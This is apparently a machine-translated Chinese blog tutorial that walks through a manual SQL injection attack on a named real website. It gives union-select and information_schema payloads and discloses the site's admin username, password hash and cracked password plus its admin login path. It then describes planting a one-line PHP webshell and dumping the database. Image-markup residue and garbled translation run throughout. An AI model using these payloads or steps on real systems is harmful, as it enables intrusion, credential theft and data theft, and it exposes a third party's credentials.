Note: This article is dedicated to those who still do not understand the injection of learning!
Target Station: http://www.51team.cn/
Injection point: http://www.51team.cn/newmess.php?id=138
find the injection point after guessing field, available ORDER by 1 guess the solution, Order by Unavailable , available Union Joint Query!
The field I'm guessing here is 22,:
650) this.width=650; "id=" aimg_kyaw5 "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051024mn2nhkhhzqqh78ii.jpg "border=" 0 "/>
Next pop-up show bit! Syntax: and 1=2 Union select1,2,4,5,..., 22 Field How much to enter, the middle too often, omitted!
Then enter to open, the page appears a 9 number!
650) this.width=650; "id=" Aimg_mssyi "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051139d4zrder9m9m4panj.jpg "border=" 0 "/>
Then we will query what version, user name, database!
Version () The current database user (), to query what will just burst the 9 display bit replaced,
650) this.width=650; "id=" aimg_cox0q "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051245nf2qthobazhoolb7.jpg "border=" 0 "/>
This is the version number, if you want to query the user name on the browser above the 9 to replace the user () on the line!
This is what I found out.
Version number: 5.1.32-community
Database: 51teamcom
User name: 51teamcom database and user name!
Next we come to the report, syntax: from INFORMATION_SCHEMA. Tableswhere table_schema=database () limit 0,1 in the browser
9 Change to TABLE_NAME, then enter, you will see the table, the first table is: dede_addonarticle We just burst the Administrator's table on the line!
We continue to explode, every time we have to modify this grammar limit 0,1 explosion 2nd when the 0 changed to 1, such as: limit, +1, the 3rd time to continue to 2,1, such as: Limit PHP 0 is the first bit!
This is my pop-up table:
Dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny, Ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_ Feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset
Dream-Weaving Program!
One of the dede_admin should be the Administrator's watch! Let's see!
Before we explode, we first convert the dede_admin into 16, which is the 646564655f61646d696e.
Syntax: Information_schema.columns wheretable_name=0x646564655f61646d696e limit0,1 or the same as above, the first few to modify the number 0, Put the 16 we just converted into the 0x back, 0x do not move, and then the display bit 9 to change the number of column_name and then the line!
I burst the paragraph: id,userid,pwd,uname,tname,email pwd should be the password, uname should be the account, we try!
and 1=2 Union select 1,2,3,4,5,6...,22 from Dede_admin the browser inside the syntax are all removed, left * * * in the line, that is;
http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin then enter!
and replace 9 with the one I just blew out. I replaced Uname and PWD and opened 2 browsers!
User is: admin password is: d9d2b2de067864194059 password encryption, can be decrypted to cmd5.com
650) this.width=650; "id=" aimg_ve878 "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051443xxbs8xccohgb8rx0.jpg "border=" 0 "/>
The password solved, this bx2013, next look backstage, can use software Sweep or Google find! I found out:
http://www.51team.cn/web_admin/login.php
Successful login:
650) this.width=650; "id=" Aimg_c8dh3 "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051537yfyaq4djvr84ihwe.jpg "border=" 0 "/>
Just find an upload point on the line, and then upload the horse, first hang a txt bar, hey! Http://www.51team.cn/a.txt
Next, take off your pants!
Take off the pants can upload the pants horse, also can use the kitchen knife, I use the chopper's Bar, convenient! Just find a php file to add a sentence!
Okay, it's connected.
650) this.width=650; "id=" AIMG_FUGGN "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051633mdldwdf1vtdtn23b.jpg "border=" 0 "/>
If you are using the net horse off, you have to look at the website configuration file conn.php inside the database user name and password!
After connecting, point to the Site list, and then right click on the URL to the database management, and then open a window, that window is the database!
650) this.width=650; "id=" aimg_hgd84 "class=" Zoom "width=" "src=" http://www.cnio.org/data/attachment/forum/ 201406/08/051729snrxznjrnrq06cjz.jpg "border=" 0 "/>
Welcome Dabigatran:QQ Group: 252799167
This article is from the "Deanne Lei" blog, please be sure to keep this source http://a3147972.blog.51cto.com/2366547/1548253
Php+mysql Hand-held shell tutorial "friends"